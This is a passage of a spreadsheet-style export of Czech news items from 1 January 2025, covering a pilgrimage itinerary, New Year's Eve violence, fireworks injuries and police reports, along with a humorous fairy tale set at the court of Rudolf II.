jsou zdrojem úžasně čisté, chladivé a chutné vody a dávají život vegetaci v údolích ostrova Samothraki. Na úpatí ostrova pak léčivé sirné prameny již odpradávna pomáhali uzdravovat starodávné obyvatele antického světa. Poznávání i odpočinek na pláži. Návštěva svatyně apoštola Pavla , mše sv, modlitby. Trajekt na pevninu, ubytování. 8. den: Kavala, v minulosti známá jako Neapolis. Právě zde vystoupil z lodi sv. Pavel na své druhé misijní cestě, aby zvěstoval evangelium.Prohlídka historického centra. Zastávkav klášteře sv. Silase, spolupracovníka apoštola Pavla . Odjezd do starobylého města Philipi, kde působil sv. Pavel . Pavel navštívil Filipy na druhé misijnícestě v r. 50/51 a založil tam první křesťanskou obec na evropské půdě. První křesťankou se stala jistá žena jménem Lydia, prodavačkapurpuru z města Tyatiry a s ní jiné ženy. Na třetí misijní cestě Pavel navštívil Filipy ještě dvakrát. Křesťané této malé církevní obcepocházeli většinou z pohanství a vyznačovali se zvláštní oddaností Pavlovi a jeho učení. Přesun do Amphipolis s krátkou zastávkou. Tudyprocházel po významné obchodní cestě Via Egnatia sv. Pavel během cesty z Filip do Thessalonik. Město bylo založeno v roce 437 př. n. l. athénskými osadníky a bylo postaveno na náhorní plošině kousek ve vnitrozemí od Egejského moře s výhledem na údolí řeky Strymon. Bylo dobyto Filipem II. Makedonským v roce 357 př. n. l. a následně se stalo důležitým centrem makedonského království. Po římském dobytí Makedonie v roce 168 př. n. l. se Amfipolis stala hlavním městem prvního meris (správního obvodu) Makedonie . Zastávka v Appolonia (další místo spjaté s apoštolem Pavlem ). V Apollonii zůstalo z římských dob jen málo, i když stará deska na opuštěném kostele tvrdí, že Pavel na tomto místě kázal, když procházel starou Via Egnatia. 9. den: Dnes zavítáme do blízkosti Nea Fokea. Na východní straně Nea Fokea je známá „Agiasma“ (Svatá voda) apoštola Pavla , která je jednou z nejatraktivnějších a nejzajímavějších památek. Kousek přes silnici od malého rybářského přístavu Nea Fokea je oblouk, který vede ke vchodu do jeskyně. Skalní dílo a těžké dřevěné dveře evokují dobu, kdy apoštol Pavel šel stejnou cestou, procházel vchodem a sestupoval po schodech vedoucích do místa, kde žil. Jedná se o podzemní chodbu o délce asi 20 km, která byla vytesána na přírodní skále a končí v pravoúhlé podzemní komoře. Pravděpodobně se jedná o starověkou pohřební stavbu, která byla během byzantského období přeměněna na kostel. Stěny komory byly vymalovány, většina obrazů byla opotřebovaná vlhkostí. Tradice říká, že apoštol Pavel vyučoval v Ierissosu, když ho pronásledovali, a v ohrožení života se dostal do díry země. Poté, procházející podzemní chodbou, dorazil ke Kassandře a vyšel v komnatě „agiasmy“. Berea (Veria) – v Pavlově době byla Berea starověkým městem, o kterém se poprvé zmínil Thúkydidés v roce 437 před Kristem. V římských dobách se stalo prosperujícím městem s velkou židovskou komunitou. Dnes mohou návštěvníci Veroie (Berea) vstoupit do raně byzantského kostela Anastasis, oslavujícího zmrtvýchvstání Ježíše Krista nebo si mohou prohlédnout dvě moderní mozaiky – jedna zobrazuje vizi muže z Makedonie a druhá ukazuje Pavla, jak zde káže místním občanům (51 n. l.). Ubytování v Soluni . 10. den: Naše putování zakončíme v Soluni (Thessaloniki), hlavním městě egejské oblasti, rodišti sv. Cyrila a Metoděje a působišti svatého Pavla, které navštívil na své druhé misijní cestě (Sk 17,1-10). Zde založil církevní obec, které adresoval dopis, dnes vedený jako 1 Soluňanům. Prohlídka města a kostela sv. Cyrila a Metoděje. Odjezd na letiště, odlet do Vídně , s příletem ve 14:40. Následně transfer do Brna . Reklama Přihlášky a informace: Diecézní centrum pro seniory, Velké nám. 32, 500 03 Hradec Králové , telefony: 737 215 328, 734 435 36, e-mail: dcs@bihk.cz, webové stránky: www.simeon.cz, www.dcshk.cz Dle zkušenosti z minulých cest doporučujeme nenechávat přihlašování na poslední chvíli a přihlásit se na zájezd co nejdříve. Těšíme se na setkání s vámi! Autor: redakce</t>
  </si>
  <si>
    <t>20250101_20_3698017614_b5f7f10994483b0b07f4.html</t>
  </si>
  <si>
    <t>b5f7f10994483b0b07f4</t>
  </si>
  <si>
    <t>Silvestrovské vraždění: Psycholog popsal, proč může být poslední den roku spouštěčem traumat</t>
  </si>
  <si>
    <t>Silvestrovské vraždění: Psycholog popsal, proč může být poslední den roku spouštěčem traumat Během silvestrovské noci policie a záchranáři zasahují u desítek až stovek případů agresivních útočníků. Spouštěčem nevyzpytatelného chování přitom nemusí být jen přehnané pití alkoholu . ČTĚTE DÁLE: Hněv na Mareše kvůli muzikálu v O2 areně? Jsem horká hlava, omluvila se Basiková za reakci „Může se to stát, pokud je člověk po delší dobu sám a samota ho trápí,“ popsal pro CNN Prima NEWS psycholog Jan Lašek jednu z pohnutek agresivního chování. „Člověk může mít někdy pocit, že jeho trápení zavinili druzí a napadne je, aniž by za to skutečně mohli,“ dodal. Takový případ se odehrál například v poslední den roku 2022 v Karlových Varech . Do lázeňského města zavítal tehdy 24letý osamělý Afghánec Esmar Shirzad, který od roku 2015 žil v Německu jako žadatel o azyl. Muž se v centru města večer seznámil s 37letou ženou, kterou později v noci v odlehlém lesíku pobodal. Napadená žena útok přežila. Shirzad následně opodál napadl a znásilnil devatenáctiletou dívku. Agresor si na osudnou noc u soudního přelíčení podle svých slov nepamatoval. Naopak si stěžoval na policejní brutalitu po zadržení. V březnu 2023 si Shirzad od soudu vyslechl trest 22 let vězení, uvedl web iDnes. Nebezpečné rodinné spory Kombinace nadměrné konzumace alkoholu a nevyřešených sporů byla příčinou také tragédie na Silvestra roku 2016 v Rýmařově . 62letý muž tehdy v záchvatu žárlivosti před půlnocí vytáhl nůž na 35letého známého a po hádce ho před svědky ubodal. Otec tří malých dětí během pár chvil vykrvácel. „Prý se ho nedalo zachránit. Dali mu šest transfuzí, jednou jim prý naskočil,“ svěřila se v červenci 2017 matka oběti serveru TN. Podle Laška je dobré se na setkání s příbuznými či s přáteli vnitřně připravit a nevyvolávat v sobě negativní emoce. „Člověk by si měl především říct, že by se neměl primárně naštvat nebo jít na to setkání s tím, že určitě dojde k nějakému sporu,“ doporučil psycholog. MOHLO BY VÁS ZAJÍMAT: Jak je to s pojištěním nového domu v záplavové oblasti? Odborník popsal, na co si dát pozor</t>
  </si>
  <si>
    <t>20250101_200_3695405529_d70111b21736d0f39f60.html</t>
  </si>
  <si>
    <t>d70111b21736d0f39f60</t>
  </si>
  <si>
    <t>Při odpalování pyrotechniky v kraji lehká nebo středně těžká poranění hlavy nebo končetiny</t>
  </si>
  <si>
    <t>Při odpalování pyrotechniky v kraji lehká nebo středně těžká poranění hlavy nebo končetiny Home Zpravodajství Aktuality Při odpalování pyrotechniky v kraji lehká nebo středně těžká poranění hlavy nebo končetiny 1.1. 2025 MS KRAJ - Během novoročních oslav zasahovali moravskoslezští záchranáři v kraji u osmi zranění vzniklých při odpalování zábavní pyrotechniky. Jednalo se vesměs o lehká nebo středně těžká poranění hlavy nebo končetiny. S diagnózou opilosti či těžké opilosti skončilo v péči zdravotníků šestnáct osob. Celkový souhrn: v posledních čtyřiadvaceti hodinách vyjížděly posádky (od rána 31.12.2024 do šesté ranní 1.1.2025) celkem ve více než 400 případech. Jen od silvestrovské půlnoci do dnešního rána záchranáři ošetřovali 111 pacientů. Nárůst zásahů v těchto hodinách byl více než dvojnásobný oproti běžným nocím. „ Mezi úrazy dominovaly pády se zraněními hlavy či končetin a řezná poranění od skla. Polovina zraněných během silvestrovské noci byla pod zjevným vlivem alkoholu , což je obdobný počet, jako v uplynulých letech. Další zhruba tři desítky ošetřovaných osob uvedly, že byly napadeny a zraněny jinou osobou, nebo utrpěly poranění při potyčkách. Také většina z nich jevila známky ovlivnění psychotropní látkou. Mezi mechanismy napadení patřily údery lahvemi, tyčemi a dalšími předměty,“ popsal mluvčí záchranky Lukáš Humpl. (rzp) ilustrační foto: ZZS MSK Autor: Město Bohumín</t>
  </si>
  <si>
    <t>20250101_201_3695412851_1796e1b1d61f7ecadaa6.html</t>
  </si>
  <si>
    <t>1796e1b1d61f7ecadaa6</t>
  </si>
  <si>
    <t>Na pěší stezce okolo Brněnské přehrady zapadl s autem muž, nadýchal jedno promile</t>
  </si>
  <si>
    <t>Na pěší stezce okolo Brněnské přehrady zapadl s autem muž, nadýchal jedno promile Foto: MP Brno Na pěší stezku na levém břehu Brněnské přehrady se poslední den roku kolem poledne vydal svým osobním autem 66letý muž. Pohyboval se na ní ve směru od Bystrce a dojel až k části s dřevěným stupňovitě uspořádaným chodníkem. Pokračoval k prvnímu schodu, u kterého auto zapadlo, uvedl ve zprávě pro média mluvčí brněnských strážníků Jakub Ghanem. Podle svého vyjádření muž zabloudil, zároveň však přivolaní policisté zjistili, že před jízdou pil alkohol a nadýchal téměř jedno promile. Bizarní nehodu ohlásil svědek Strážníky k bizarní nehodě, která se obešla bez zranění, přivolal svědek. Podezření, že je muž opilý, pojali strážníci už při vysvětlování. Jelikož také nebylo možné autem odjet, zavolali na místo kromě policistů i hasiče, aby vůz vyprostili. Stezku si lidé oblíbili kvůli výhledu na hrad Veveří Stezka okolo přehrady je celoročně oblíbeným výletním místem Brňanů, chodí po ní i jezdí na kole. Z dřevěného chodníku, který vede několik desítek metrů místy téměř nad hladinou přehrady, je i výhled na hrad Veveří. Líbí se mi Autor: Monika Švehlová Autor person Monika Švehlová Rubrika transition_slide Události</t>
  </si>
  <si>
    <t>2840</t>
  </si>
  <si>
    <t>20250101_202_3695413514_f4c32dd3f43fcc9b8288.html</t>
  </si>
  <si>
    <t>f4c32dd3f43fcc9b8288</t>
  </si>
  <si>
    <t>Anděl Páně na dvoře císaře Rudolfa II</t>
  </si>
  <si>
    <t>Anděl Páně na dvoře císaře Rudolfa II nepíšu pohádky, tak se omlouvám předem. Napsáno na počest mé oblíbené pohádky, snad tímto pokusem nikoho nepohorším a tvůrce neurazím. Velká komnata na Pražském hradě byla zahalena do šera. Po stěnách tančily stíny vysokých svící, jejich mihotavé světlo osvětlovalo vážné tváře přítomných. Na vyvýšeném trůně seděl císař Rudolf II., zaujatě sledující podivný výjev uprostřed místnosti. Tam, v kruhu nakresleném křídou plném tajemných znaků, klečel věhlasný alchymista Edward Kelley se zavřenýma očima, zatímco jeho učitel, učený John Dee , tiše šeptal modlitby. Byly to slavné „andělské hovory“, o nichž se říkalo, že během nich Kelly dokáže zprostředkovat rozhovory s nebeskými bytostmi. Rudolf se lehce naklonil, oči plné očekávání. Ale někdo další se na to díval úplně jinak. Za těžkým sametovým závěsem, neviditelný pro lidské oči, postával mladý čert Fabián. Rudovlasý šibal, sotva odrostlý pekelnému učni, se vydal do světa na zkušenou – a hned zamířil na místo, kde lidé dokazovali svou moudrost a moc. Čekal vážné debaty, důstojné pány a noblesní dvorní dámy. Namísto toho našel tuhle komedii. Sledoval Kellyho se zájmem. Alchymista se tvářil nehnutě, jeho oči nepatrně těkaly, jako by opravdu něco slyšel. Fabián se rozhodl, že tomu podvodníkovi zpestří představení a pobaví se na jeho účet. Naklonil se blíž a šeptem pronesl: „Prd.“ Kelly otevřel jedno oko. Letmo pohlédl na císaře, ale mlčel. „Zadek,“ přidal Fabián, potěšený, když Kelley sotva znatelně škubl koutkem úst. Bylo to dokonalé. Mohl říkat, co chtěl, a Kelly musel mlčet, aby nezničil své představení před císařem. „Bačkoro,“ zkusil čertík a zadržoval smích, když alchymista stiskl rty pevněji. „Škoda, že si to pantáta nemůže užívat jako já, „ řekl si Fabián a pobaveně se zakřenil na císaře. Kelly se však ani nehnul, a přesto mu koutkem úst přelétl stín úsměvu. Pochopil hru. To ovšem netušil Fabián, nadšený z nové zábavy, jakou mu svět lidí nabízel. Už se těšil, co si na Kelleyho připraví příště. Za bránou Nebeského království vládla obvyklá pohoda. Anděl Petronel, známý svou nešikovností, měl právě službu s čertem Uriášem. Byla to neobvyklá kombinace, ale za ta léta se z nich stali přátelé. Dnes však bylo něco jinak. Uriáš seděl na oblaku, zamračený a tichý, což nebylo jeho zvykem. „Copak, Uriáši?“ zkusil Petronel vlídně. „Chybí ti peklo? Nechceš zkusit ty koláčky od svaté Barbory? “ Uriáš se ani nepohnul, jen si povzdychl. Petronel to zkusil znovu. Vyprávěl jeden ze svých trapných vtipů o nešikovném serafovi, který si spálil křídla na slunci, ale Uriáš zůstal netečný. Nakonec Petronel přestal a posadil se vedle něj. „Uriáši,“ řekl vážně, „známe se dlouho. Řekni mi, co tě trápí. Přátelé si přece pomáhají.“ Uriáš mlčel, ale Petronelův upřímný tón ho nakonec přiměl promluvit. „Je to můj synovec,“ přiznal tiše. „Fabián. Vyrazil poprvé z pekla do světa na zkušenou. Jenže se nechal chytit tím... podvodníkem Edwardem Kelleym . Ten ho uvěznil v magické pasti a teď ho nutí splnit tři přání.“ Petronel se zamračil. „Tři přání? A co to znamená? Prostě mu je splní, ne?“ „Pokud mu je splní,“ odtušil temně Uriáš. „A nedokáže je nějak pokazit, promění se v kámen a tak to prostě je. Proto je na světě tolik kamenů, kterým se říká čertovi.“ Uriášův hlas byl plný zoufalství. „Fabián je mladý a nezkušený. Nemá šanci přelstít tak prohnaného člověka, jakým je Kelley . Řekne přání tak neurčitá, že z jednoho získá co nejvíc.“ Petronel znatelně vyděšený přikývl a poplácal ho po zádech. „Zkus se u vás dole zeptat, jestli bys mu nemohl pomoci. Dovolenou si neměl pěkně dlouho, tak to snad dopadne A já se zkusím přimluvit u Pána Boha.“ Uriáš váhal, ale nakonec souhlasil. Lucifer byl zpočátku svolný. Proč by ne? Fabián byl mladý čert, peklu by byla škoda. Ale jeden z pekelníků, arogantní a zákeřný čert Zargon, který na Uriáše žárlil, se do věci vložil. „Proč by měl Uriáš zasahovat?“ prohlásil. „Když je jeho synovec tak hloupý, měl by nést následky.“ Lucifer se zamyslel a nakonec rozhodl: „Dobrá. Uriáš může pomoci, ale jen v lidské podobě. A platí podmínka: pokud Uriáš v té podobě zemře, promění se také v kámen.“ Uriáš zaváhal, ale přijal podmínku. „Udělám, co bude v mých silách.“ Mezitím se Petronel obrátil na Pána Boha. „Pane,“ prosil, „mohl bych jít s Uriášem? Pomohl bych mu zachránit jeho synovce.“ Pán Bůh se usmál. „Dobrá. Můžeš jít, Petroneli, ale i ty půjdeš v lidské podobě. A pamatuj, že musíš plnit úkoly jako člověk. Nebude to snadné.“ Pak Bůh dodal něco, co v celé situaci přineslo nečekaný zvrat. „Luciferova podmínka bude platit pro všechny, kdo se budou chtít vměšovat.“ Zargon, který plánoval sabotovat Uriášovo snažení, teď neměl jinou možnost než přijmout stejnou podmínku. A tak se tři bytosti – anděl, čert a jejich nepřítel – ocitly na zemi, v lidské podobě, připraveny čelit výzvám, které je čekaly. Mezitím, co Petronel s Uriášem sestupovali na zem, Edward Kelly nezahálel. S pomocí mladého čerta Fabiána, který byl stále pod jeho vlivem díky magickému kruhu, Kelly postupně realizoval své první přání. Toužil být bohatým a úspěšným mužem se šlechtickým titulem. Fabián mu, ač nerad, musel pomáhat. Vyměňoval obyčejné předměty při pokusech před císařem za zlato, falšoval dokumenty, a dokonce Rudolf, fascinovaný Kellyeho „zázračnými schopnostmi“, z něj udělal rytíře z Imani a daroval mu několik statků. Kellyeho vliv na dvoře rostl a brzy se stal oblíbencem nejen císaře, ale i části jeho dvořanů. Přesto měl Kelly stále vyšší ambice. Poohlížel se po bohaté nevěstě, která by mu zajistila ještě větší moc a vliv. Na dvoře se brzy objevil jeho nový cíl – mladá dvorní dáma, jediná dědička rozsáhlého panství na Moravě s titulem kněžna. Byla blízkou přítelkyní Kateřiny Stradové , která byla jedním z důvodů, proč se císař nechtěl oženit, což ji činilo ještě lákavější partií. Kelly jí zamýšlel získat vlastním šarmem, aby si své poslední přání mohl schovat na později. Jeho druhé přání bylo, aby mu mladý čert pomohl odstranit konkurenta – hraběte, který o ruku kněžny rovněž usiloval. Fabián se s chtíc nechtíc podvolil a vůbec netušil, jak se má vyhnout jasnému zadaní. S využitím magie se na chvíli proměnil v hraběte a začal na císařském dvoře šířit pomluvy o Rudolfovi. Skandál na sebe nenechal dlouho čekat, a skutečný hrabě byl obviněn a vyhnán od dvora. Hrabě, který vůbec netušil, co se stalo, se na cestě pryč z Prahy náhodou setkal s Petronelem a Uriášem. Ti dva, se v lidské podobě zhmotnili nedaleko hlavního města. Hrabě jim vylíčil svůj příběh, stále zmatený a rozhořčený nad podivnou intrikou, jejíž obětí se stal. „Asi mi je jasné, kdo tohle mohl dokázat,“ zamračil se Uriáš, když si vyslechl podrobnosti. „O tom není pochyb,“ dodal Petronel, který viděl, jak jeho přítel sevřel ruce v pěst. „Musíme pospíšit, než Kelley kněžnu získá.“ Hraběti prozradili, kdo za tím stojí a ten zuřil. Všiml si, že se Kelly ochomýtá kolem jeho vyvolené. Netušil co zatím dělat, ale přísahal, že se pokusí dostat Kelleymu na kobylku. S tím se rozloučili, neboť hrabě se vrátit zatím nemohl. Cestou do Prahy potkali mnoho lidí a uvědomovali si, že malichernost a sobeckost některých obyčejných lidí je pořád stejná. Na jednom místě narazili na sousedy, kteří se hádali o jablka rostoucí na větvích jabloně přesahujících plot. Petronel se snažil spor urovnat, ale marně. „Těm by snad nepomohl ani anděl.“ povzdychl si, zatímco Uriáš temně pronesl, že moc dobře ví, kde s takovou skončí. Řekl to takovým způsobem, že ty dva rozvadění kohouti spor raději ukončili, alespoň pro ten den. O kousek dál našli uplakaného muže. „Jsem zničený!“ bědoval. „Musel jsem dát lichváři vše, co jsem měl! Teď nemám nic!“ Uriáš zamyšleně pozoroval jeho zoufalství. „A my trestáme hříšníky peklem, možná by bylo lepší je připravit o peníze ještě na zemi. Třeba to v pekle nadhodím a uděláme nějaké inovace.“ „Lidi je snadné zničit“, ušklíbl se Petronel spíš smutně, než pobaveně. I po stovkách let svého bytí nepřestával věřit, že třeba jednou budou všichni lidé lepší. Konečně dorazili do Prahy . Aby se dostali na císařský hrad, rozhodli se vydávat za umělce. Petronel tvrdil, že předvádí zázraky, a Uriáš se představil jako mistr ohnivých kouzel. Přestože byli v lidské podobě a jejich schopnosti byly omezené, Petronel vzýval svaté, kteří mu pomáhali nenápadnými zázraky, zatímco Uriáš se spoléhal na triky, k nimž mu nenápadně napomáhali jeho pekelní přátelé. Jejich vystoupení na dvoře mělo ohromný úspěch. Petronel dokázal rozkvést suchou květinu a rozbité zrcadlo spojit v jeden celek. Uriáš zaujal fascinujícími ohnivými kruhy, které jako by tančily na povel jeho rukou. Rudolf II. byl nadšený. „Tohle je pravá zábava hodná mého dvora!“ zvolal a jako odměnu nechal každému z nich darovat váček plný zlatých mincí. Petronel s Uriášem však neměli čas na oslavy. Jejich skutečný úkol teprve začínal, a kněžna byla stále v ohrožení. Zatímco se Petronel a Uriáš snažili zapadnout mezi dvořany, zlý čert Zargon, který také přijal lidskou podobu, vyčkával příležitosti. Podařilo se mu infiltrovat Pražský hrad, kde se vydával za sluhu jednoho z nižších šlechticů. I když byl zbaven pekelných sil, jeho zákeřnost a lstivost ho neopouštěly. Rozhodl se zasáhnout tak, jak mohl – jako člověk. Zargon nejprve zkoušel nenápadně otrávit jejich jídlo. Ale každý jeho pokus zmařila neviditelná ochrana – ať už od nebeských sil, nebo pekelných přátel Uriáše, kteří nechtěli přijít o svého druha. Tím více v něm rostla frustrace. Nakonec se rozhodl jednat přímo a tajně poslal Edwardu Kelleymu varování: „Na hradě jsou dva nebezpeční vetřelci, kteří chtějí překazit tvé plány. Dávej si na ně pozor.“ Kelley , který už během kouzelných vystoupení Petronela a Uriáše cítil, že ti dva nejsou obyčejní, se po přečtení zprávy ještě více ostražitě díval kolem sebe. Jedné noci, když Kelley připravoval další část svého plánu, se Petronelovi a Uriášovi podařilo dostat do jeho komnat. Schovaní za těžkým závěsem vyslechli rozhovor mezi Kelleym a vyslancem Matyáše Habsburského , Rudolfova mladšího bratra. Vyslanec naléhal na Kelleyho , aby podvodem připravil císaře o trůn. „Máme podporu několika dvořanů,“ šeptal vyslanec, „ale musíme císaře přimět podepsat tuto listinu. Jakmile to udělá, zbytek je otázkou času.“ Kelley přikývl a slíbil, že plán dokončí. Petronel a Uriáš věděli, že mají důkazy, které mohou Kelleyho zničit. Když rozhovor skončil a vyslanec odešel, nenápadně ukradli s pomocí klíče od svatého Petra listinu z Kelleyho stolu. Vše se zdálo být na dobré cestě, když v tom Zargon, který hlídal na chodbě, pochopil co se děje a zabušil na dveře. Hluk probudil Kelleyho . „Kdo je tam?!“ vykřikl Kelley , popadl pochodeň a rozhlédl se. Když spatřil Petronela a Uriáše, kteří se snažili vyklouznout z jeho pokoje, pochopil, že to nejsou obyčejní dvořané. „Čerte!“ zařval na Fabiána, který se náhle objevil ve dveřích. „Znič je!“ Fabián, stále pod vlivem Kelleyho magického kruhu, se pokusil splnit poslední přání. Začala divoká honička po paláci a jako zázrakem nepotkali jediného strážného. Fabián byl rychlejší a silnější než Petronel s Uriášem, ale každým krokem bojoval sám se sebou. Jeho pohyby byly zmatené – jednou se vrhl na Uriáše, ale vzápětí narazil do zdi. Pokusil se udeřit Petronela, ale místo toho si poranil vlastní ruku. Z rukou mu šlehal plamen, ale vždy jen kolem těch dvou. Listina však vypadla Uriášovi z rukou a vzplála. „Pomoc,“ vydával ze sebe nešťastně Fabián. „Bojuje sám se sebou!“ pochopil Uriáš. „Musíme mu pomoct, než nás zničí – a sebe s námi.“ Petronel naštěstí snad osvítil sám duch svatý a dostal nápad. Popadl svůj váček plný zlatých mincí a hodil ho na zem před Fabiána. „Tady to máš! Všechno, co mám!“ zvolal zoufale. „Zničil jsi mě! Jak může být člověk víc zničený než ten, co nemá nic?“ Uriáš pochopil, co má dělat. Rychle následoval Petronelův příklad a také odhodil svůj váček. „Jsme zničení!“ křikl. „Nemáme nic! Uspěl jsi, čerte!“ Fabián se zastavil. Slova „zničení“ ho zasáhla jako blesk. Právě v tu chvíli byl jeho úkol splněn. Magický kruh, který ho poutal ke Kelleymu , se zlomil. Mladý čert padl na kolena a zhluboka dýchal, svobodný. V tom okamžiku se dostal do pekel. Petronel a Uriáš si zhluboka oddychli, ale hned si uvědomili, že něco není v pořádku. Stále byli lidmi. A to znamenalo, že nebe ani peklo nepovažují úkol za splněný. Aby se mohli vrátit kam patří, museli potrestat Kelleyho , to pochopili okamžitě. Při Hraběti snad stálo samo nebe, protože cestou na své panství potkal v prvním hostinci anglického kupce, který mu u číše vína prozradil, že Edward Kelley přišel o uši jako trest za své podvody v Anglii . Netroufal si vrátit se na hrad a věděl, že času není nazbyt. Našel rychlého posla, který přátelům předal list s touto informací. „Musíme nastražit past,“ řekl Uriáš a sdělil svůj nápad Petronelovi. Jejich tajemný „sledující“ nikdy nebyl daleko. Měnil jen převleky a tentokrát zvolil starou šlechtičnu se závojem. Nenápadně si sedl u oběda k hodovního stolu co nejblíž oběma přátelům a špicoval uši. To byla ta správná chvíle pro začátek představení! „Císař nepřišel na oběd. Musíme mu listinu předat až při večeři,“ sykl Uriáš. „Teď nebo večer, to už je jedno,“ odtušil Petronel. „Hlavně hlídej pouzdro ty Matlo.“ „O nic nejde, Kelley to nemůže tušit. Naštěstí tu není, tak si myslí, že nás Fabián zničil a někde odpočívá po splněných úkolech jako kámen. Kdyby nás viděl, to by bylo jiné. Myslím že by se nás pokusil zabít snad i tady na veřejnosti,“ řekl Uriáš. „A hlavně,“ dodal a zašklebil se, „pouzdro hlídám já a matla jsi ty.“ Zargon nepotřeboval slyšet víc. Byl to poslední zoufalý pokus, jak se zbavit alespoň Uriáše, kterého nenáviděl. U nebeské brány měl přece dávno být on! Na nic nečekal a pelášil do pověstné alchymistické laboratoře, což u staré dámy nepůsobilo právě normálně. Ani se nepřevlékl a v laboratoři jen zvolnil krok. V laboratoři vždy pracovalo plno lidí, přesně jak předpokládal Uriáš. Někteří se stali svědky podivné události. Stará dáma se závojem se došourala ke Kelleymu a nadzvedla jeho pověstné dlouhé husté vlasy. Ten vyskočil jako čertík z krabičky, strhl té osobě závoj z hlavy. Objevil se tam muž, který se poslední dny objevoval u dvora. „Ty špehu, já tušil že jdeš po mě!“ křičel vztekle. Zatímco z jeho ústa opouštěla tato slova, opustila dýku pochvu na jeho opasku a ponořila se vyděšenému muži do prsou. Odehrálo se to poblíž otevřeného okna, kterým muž s dýkou v hrudi vypadl ven. Pod okny tekoucí řeka Vltava ho pohltila. Nemohli už vidět Zargona jak se v poslední chvíli svého vědomí uvědomil, že prohrál. To co přál ze závisti Uriášovi, se nakonec stalo jeho samotnému. Strážní okamžitě vraha zatkli a vyslechli. Kelley nakonec chtě nechtě musel přiznat důvod, proč na dvořana zaútočil. Nakonec by se ukázalo, že nemá uši, svědků bylo příliš mnoho. Císař byl okamžitě informován o incidentu. Kelley byl zatčen a veškeré jeho činy vyšly najevo, včetně jeho spiknutí s Matyášem . Přiznal i intriku s Hrabětem, akorát jeho vyprávění tom, že mu sloužil čert nikdo nevěřil a spokojili se s tím, že našel nějakého dvojníka. Snad i proto, že šel Kelley nakonec s pravdou ven, unikl nejtěžšímu trestu a skončil ve vězení. Petronel s Uriášem se konečně mohli vrátit tam, kde bylo jejich místo. Ještě se rozloučili s hrabětem, který mohl usilovat opět o srdce své vyvolené. A když další den měli službu u nebeské brány, povídali si vesele jako obvykle. A tak všechno dopadlo tak jak mělo. Petronel a Uriáš se vrátili na svá místa v nebi a pekle. Fabián, osvobozený od svých chyb, se poučil a stal se jedním z nejchytřejších pekelných šibalů. Získal hrabě srdce dámy? Možná ano a třeba si jej i udržel. A lidé? Ti se dál dohádovali, zda Edward Kelley byl čaroděj, nebo podvodník – aniž by tušili, kolik bytostí z jiných světů zasáhlo do jeho příběhu. A Rudolf II.? Ten dál vládl, ale mnohem raději hledal odpovědi na otázky, ať už byla ukrytá v tajemstvích alchymie, nebo mezi hvězdami. Autor: Pavel Felcman Autor Pavel Felcman</t>
  </si>
  <si>
    <t>20250101_203_3695405669_ea78fdbce4410e611320.html</t>
  </si>
  <si>
    <t>ea78fdbce4410e611320</t>
  </si>
  <si>
    <t>Přelom roku v KNTB: první miminko, zranění pod vlivem alkoholu i problémy se zažíváním St 1. 1. 2025 - 11:32 Zdraví Silvestrovská noc byla na urgentním příjmu Krajské nemocnice T. Bati ve Zlíně co do závažnosti úrazů celkem klidná, podle zdravotníků nedošlo k žádným vážným úrazům nebo poraněním. První miminko roku 2025 přišlo ve zlínské porodnici na svět půl hodiny po půlnoci.</t>
  </si>
  <si>
    <t>20250101_204_3695394286_e9adbe34870380498cc8.html</t>
  </si>
  <si>
    <t>e9adbe34870380498cc8</t>
  </si>
  <si>
    <t>Za 12 hodin přijali policisté okolo 190 oznámení. Napadení, rvačky, požáry, obavy o příbuzné, alkohol</t>
  </si>
  <si>
    <t>Za 12 hodin přijali policisté okolo 190 oznámení. Napadení, rvačky, požáry, obavy o příbuzné, alkohol vložil Policie ČR jméno Policie ČR autor textu Karolína Macháčková zdroj textu tisková zpráva autor fotografií ilustrační foto hash tag zasahypolicistu 01.01.2025 11:32 krimi Zobrazeno 783x Od 18. hodiny 31. prosince 2024 do 6. hodiny ranní 1. ledna 2025 přijali operační důstojníci okolo 190 oznámení, což je téměř identický počet jako minulý rok. Jednalo se převážně o fyzická či slovní napadení, problémy v občanském soužití, rvačky, výtržnosti, rušení nočního klidu, požáry a komplikace v silniční dopravě. Společným jmenovatelem přitom u drtivé většiny těchto událostí byl alkohol . Příkladně, krátce po 21. hodině policisté na lince 158 obdrželi oznámení o podnapilém řidiči osobního vozidla Volkswagen v Hradci Králové . Policistům se ho na předpokládané trase oznamovatele podařilo nalézt a zastavit. Dechové zkoušky u řidiče byly pozitivní a vykázaly hodnoty 1, 97 a 2 promile alkoholu v dechu. Muž byl následně zadržen a po jeho vystřízlivění s ním budou provedeny standardní procesní úkony. Věc je prověřována pro podezření ze spáchání přečinu ohrožení pod vlivem návykové látky. Krátce po 22. hodině přijali oznámení o osobním vozidle jedoucím v protisměru na dálnici D11. Oznamovatelka jela z Prahy na Hradec Králové a okolo 83 kilometru mělo proti ní jet osobní vozidlo Hyundai. Policejní hlídky projely daný úsek dálnice v obou směrech, ale popsané vozidlo nenalezly. Ani dálniční kamery uváděné vozidlo nezachytily. Opakovaně policisté vyjížděli v součinnosti s hasiči k požárům, převážně se jednalo o koše a kontejnery, ale i o stromy a v jednom případě vyjížděli k hořícímu vozidlu. Vždy včasným zásahem se podařilo minimalizovat škody. Během noci docházelo k průběžným oznámením na použití pyrotechniky. V žádném případě nebylo zjištěno protiprávní jednání. Těsně před půlnocí se dle oznamovatele nezvaný host snažil dostat do uzavřené pizzerie na Jičínsku. Na místě byl však po příjezdu Policie ČR klid. Nedaleko byla zjištěna bavící se mládež, která byla ztotožněna a zkontrolována. Obce Špindlerův Mlýn , Skuhrov nad Bělou, Třebechovice pod Orebem a Mostek spojovala během přelomu roku obava o blízké, kteří byli někým z rodiny či známými pohřešovani. Ve všech čtyřech případech byli všichni naštěstí po krátké chvíli nalezeni a všechna pohřešování měla tak šťastný konec. Některá oznámení se po příjezdu hlídky na místo ani nepotvrdila. Na mnoha zásazích policisté spolupracovali s hasiči, záchranáři a strážníky městských policií. K závažnému narušení veřejného pořádku nedošlo. Vzhledem k očekávanému zvýšenému provozu na silnicích během dnešního dne, kdy se mnoho lidí bude vracet z rekreací a oslav, apelujeme na řidiče, aby byli na cestách opatrní a ohleduplní, a aby v žádném případě neřídili pod vlivem alkoholu nebo jiných návykových látek. Silvestrovská opatření pro policisty nekončí ani s příchodem Nového roku. S nástupem roku 2025 se policejní hlídky zaměřují kromě dohledu nad veřejným pořádkem i na bezpečnost na silnicích. Mějte na paměti, že alkohol bývá častou příčinou dopravních nehod s tragickými následky. Buďte zodpovědní a ohleduplní, nejen na začátku tohoto roku! Zajímavé zprávy z regionu Autor: Orlický.net</t>
  </si>
  <si>
